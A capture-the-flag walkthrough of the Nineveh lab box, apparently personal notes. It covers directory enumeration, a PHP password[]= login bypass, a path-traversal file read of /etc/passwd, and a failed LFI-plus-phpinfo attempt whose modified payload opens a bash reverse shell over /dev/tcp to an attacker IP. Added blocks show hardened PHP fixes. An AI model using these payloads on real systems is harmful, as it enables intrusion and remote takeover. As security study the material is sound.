# 2 ports open: :80, :443 (enumerated in parallel)
http://nineveh.htb/
It works!
| splash page
$ gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 100
===============================================================
/info.php (Status: 200) [Size: 83687]
/index.html (Status: 200) [Size: 178]
/department (Status: 301) [Size: 315] [--> http://10.10.10.43/department/]
http://nineveh.htb/info.php
PHP Version 7.0.18-0ubuntu0.16.04.1
System Linux nineveh 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64
Loaded Configuration File /etc/php/7.0/apache2/php.ini
Server Root /etc/apache2
DOCUMENT_ROOT /var/www/html
file_uploads On
http://nineveh.htb/department/ > http://nineveh.htb/department/login.php
login page
# view-source
<!-- @admin! MySQL is been installed.. please fix the login page! ~amrois -->
$ gobuster dir -u http://nineveh.htb/department/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 100
===============================================================
/header.php (Status: 200) [Size: 670]
/footer.php (Status: 200) [Size: 51]
/files (Status: 301) [Size: 321] [--> http://nineveh.htb/department/files/]
/login.php (Status: 200) [Size: 1560]
/index.php (Status: 200) [Size: 68]
/css (Status: 301) [Size: 319] [--> http://nineveh.htb/department/css/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/manage.php (Status: 302) [Size: 0] [--> login.php]
# all redirect to login.php
# default admin:admin fails
# but user enum is possible
admin:admin => Invalid Password!
amrois:amrois => invalid username
# tried auth-bypass/sqli.txt - nothing.
# tried manual sqli to find columns - nothing.
# tried in Burp: changing password=password to password[]=
# works > http://nineveh.htb/department/manage.php
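The password[]= bypass above matches a well-known PHP pattern: a hardcoded credential checked with strcmp() under a loose comparison. Added example, not the box's login.php; the username, secret and stored hash are assumed values. The weak branch behaves this way on PHP 7 (the version on this host); PHP 8 throws a TypeError instead.

```php
<?php
// Added example: the comparison pattern behind a password[]= bypass and a
// hardened replacement. Not the box's code; credentials are assumed values.

// Weak check. If the request sends password[]=, $_POST['password'] is an array.
// On PHP 7, strcmp() with a non-string argument emits a warning and returns NULL,
// and NULL == 0 is true under loose comparison, so the check passes.
function weakLogin(array $post): bool
{
    $user = $post['username'] ?? '';
    $pass = $post['password'] ?? '';
    return $user == 'admin' && @strcmp($pass, 'hardcoded-secret') == 0;
}

// Hardened check.
function safeLogin(array $post, string $storedHash): bool
{
    $user = $post['username'] ?? null;
    $pass = $post['password'] ?? null;
    // Reject anything that is not a plain string before it reaches a comparison;
    // form fields become arrays whenever the client chooses to send name[]=.
    if (!is_string($user) || !is_string($pass)) {
        return false;
    }
    // Strict username comparison and verification against a password_hash()
    // value instead of a hardcoded plaintext. Both failure paths return the same
    // result so the caller shows one generic message (no "invalid username" vs
    // "Invalid Password!" split that allows user enumeration).
    return $user === 'admin' && password_verify($pass, $storedHash);
}

$storedHash = password_hash('hardcoded-secret', PASSWORD_DEFAULT);
$bypassAttempt = ['username' => 'admin', 'password' => ['']];
$realAttempt   = ['username' => 'admin', 'password' => 'hardcoded-secret'];

var_dump(weakLogin($bypassAttempt));
var_dump(safeLogin($bypassAttempt, $storedHash));
var_dump(safeLogin($realAttempt, $storedHash));
```

On PHP 7 the first var_dump is true and the second false; the is_string() guard is what closes the bypass, the hash verification is what removes the hardcoded secret.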
http://nineveh.htb/department/manage.php
logged in as admin
| notes section
http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt
Have you fixed the login page yet! hardcoded username and password is really bad idea!
check your serect folder to get in! figure it out! this is your challenge
Improve the db interface.
~amrois
# failed LFI using http://nineveh.htb/department/manage.php?notes=../../../../../../etc/passwd
# failed LFI http://nineveh.htb/department/manage.php?notes=files/../../../etc/passwd
http://nineveh.htb/department/manage.php?notes=files/ninevehNotes/etc/passwd
Warning: include(files/ninevehNotes/etc/passwd): failed to open stream: No such file or directory in /var/www/html/department/manage.php on line 31
# we are in /var/www/html/department
# no such file or directory
# removing ninevehnotes/
http://nineveh.htb/department/manage.php?notes=files/../../../../etc/passwd
No Note is selected
# the error message was informative, so keeping ninevehNotes and removing files/
# gives LFI
http://nineveh.htb/department/manage.php?notes=/ninevehNotes.txt/../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
amrois:x:1000:1000:,,,:/home/amrois:/bin/bash
# also works http://nineveh.htb/department/manage.php?notes=/ninevehNotes.txt/../etc/passwd
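The notes loader above passes whatever path survives a substring check on ninevehNotes straight to include(), which is what lets ../ reach /etc/passwd and, in the phpinfo step that follows, turns a file read into code execution. Added example of how such a loader should resolve a note name, covering both of those passages; not the box's manage.php, and the notes directory and file-name rule are assumptions.

```php
<?php
// Added example (not the box's manage.php): serving notes by name without
// letting the request choose the path. NOTES_DIR is an assumed location.
const NOTES_DIR = '/var/www/html/department/files';

function resolveNote(string $requested, string $baseDir = NOTES_DIR): ?string
{
    // Keep only a bare file name: basename() strips directories and any ../
    // sequences, so "ninevehNotes.txt/../../etc/passwd" collapses to "passwd".
    $name = basename($requested);
    // Allow only the characters a note name should have.
    if ($name === '' || !preg_match('/^[A-Za-z0-9_-]+\.txt$/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    // realpath() returns false for missing files and resolves symlinks, so the
    // prefix check also rejects a link inside the directory pointing outside it.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function showNote(string $requested): string
{
    $path = resolveNote($requested);
    if ($path === null) {
        return 'No Note is selected';
    }
    // Read and escape: a note is data, never code, so no include()/require().
    // This is what denies the later LFI + phpinfo temp-file trick a place to run.
    $text = file_get_contents($path);
    return '<pre>' . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . '</pre>';
}

// In manage.php this would be: echo showNote($_GET['notes'] ?? '');
foreach (['files/ninevehNotes.txt', '/ninevehNotes.txt/../../../../etc/passwd'] as $req) {
    echo $req, ' => ', showNote($req), PHP_EOL;
}
```

The traversal request falls out at the file-name rule; a legitimate note name only succeeds if the file really exists under NOTES_DIR after realpath().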
# as file_uploads is On, testing LFI + phpinfo() = RCE.
# capturing info.php via burp
# changing GET, Content-Type and data
POST /info.php HTTP/1.1
Host: nineveh.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=mq5puchlsho4m8r1u0q2m3tl30
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------7db268605ae
Content-Length: 194
-----------------------------7db268605ae
Content-Disposition: form-data; name="dummyname"; filename="test.txt"
Content-Type: text/plain

Security
Test
-----------------------------7db268605ae
# response
<h2>PHP Variables</h2>
<table>
<tr class="h"><th>Variable</th><th>Value</th></tr>
<tr><td class="e">$_FILES['dummyname']</td><td class="v"><pre>Array
(
[name] => test.txt
[type] =>
[tmp_name] =>
[error] => 3
[size] => 0
)
# no tmp_name? weird?
# still running exploit to check
# added at the top of the script
local_ip="10.10.16.7"
local_port=443
phpsessid="mq5puchlsho4m8r1u0q2m3tl30"
# modified payload
PAYLOAD="""%s\r <?php system("bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'");?>\r""" % (TAG, local_ip, local_port)
# modified request location and added Cookie
REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
Cookie: PHPSESSID=mq5puchlsho4m8r1u0q2m3tl30; othercookie="""+padding+"""\r
# modified LFIREQ; added cookie as we need to be logged in to access that page
LFIREQ="""GET /department/manage.php?notes=/ninevehNotes/..%s HTTP/1.1\r
Cookie: PHPSESSID=mq5puchlsho4m8r1u0q2m3tl30\r
# changed => to => (notes)
$ python phpinfolfi.py 10.10.10.43 80 100 130
Don't forget to modify the LFI URL
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset...
Traceback (most recent call last):
File "phpinfolfi.py", line 201, in <module>
main()
File "phpinfolfi.py", line 161, in main
offset = getOffset(host, port, reqphp)
File "phpinfolfi.py", line 120, in getOffset
raise ValueError("No php tmp_name in phpinfo output")
ValueError: No php tmp_name in phpinfo output